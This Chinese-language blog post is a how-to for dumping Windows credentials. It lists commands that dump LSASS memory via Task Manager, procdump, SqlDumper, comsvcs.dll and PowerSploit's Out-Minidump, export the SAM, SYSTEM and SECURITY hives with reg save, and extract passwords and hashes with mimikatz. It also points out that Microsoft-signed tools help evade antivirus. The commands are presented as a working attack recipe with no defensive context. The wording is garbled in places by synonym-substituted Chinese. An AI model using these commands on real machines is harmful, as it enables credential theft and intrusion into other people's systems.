前言
本文总结常见的离线解密hash的方式,如有不对之处,还请各位师傅斧正。
任务管理器
以管理员身份翻开任务管理器,选中lsass进程,创立转储文件
之后会显现转储文件保管的位置
之后运转mimikatz本地解密
sekurlsa::minidump C:\Users\root\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords
Procdump
运用Procdump(管理员权限)停止进程转储,能够下载具有微软签名的procdump,具备一定的免杀才能
https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
之后对导出的凭据停止解密
sqldumper
SQLDumper.exe
包含在Microsoft SQL和Office中,可生成完好转储文件
sqldumper的常见途径如下
C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe
C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\SQLDumper.exe
C:\Program Files (x86)\Microsoft SQL Server\100\Shared\SqlDumper.exe
之后运转
SqlDumper.exe <lsass pid> 0 0x01100
再本地解密即可
comsvcs.dll
运用 rundll32找到机器的comsvcs.dll,之后以powershell(管理员)运转以下命令
Get-Process lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <pid> C:\lsass.dmp full
之后本地解密
这里测试cmd不能导出文件,后来经过搜索发如今dump指定进程内存文件时,需求开启SeDebugPrivilege权限
。而在cmd中此权限是默许禁用的,powershell是默许启用的。
简单处理方法:我们能够在cmd中开启此权限
运用工具https://github.com/daem0nc0re/PrivFu/tree/main/SwitchPriv 来切换权限
注册表导出sam文件
system文件位置:C:\Windows\System32\config\SYSTEM
SAM文件位置:C:\Windows\System32\config\SAM
reg save HKLM\SYSTEM C:\system.hiv
reg save HKLM\sam C:\sam.hiv
之后对导出的sam文件停止解密
lsadump::sam /sam:C:\sam.hiv /system:C:\system.hiv
这里也能够导出HKLM\security
,然后mimikatz离线解密
Out-Minidump
运用powershell脚本:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
运转
Import-Module .\Out-Minidump.ps1 Get-Process lsass | Out-Minidump
感谢您的来访,获取更多精彩文章请收藏本站。
1 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
2 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
3 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
- 最新
- 最热
只看作者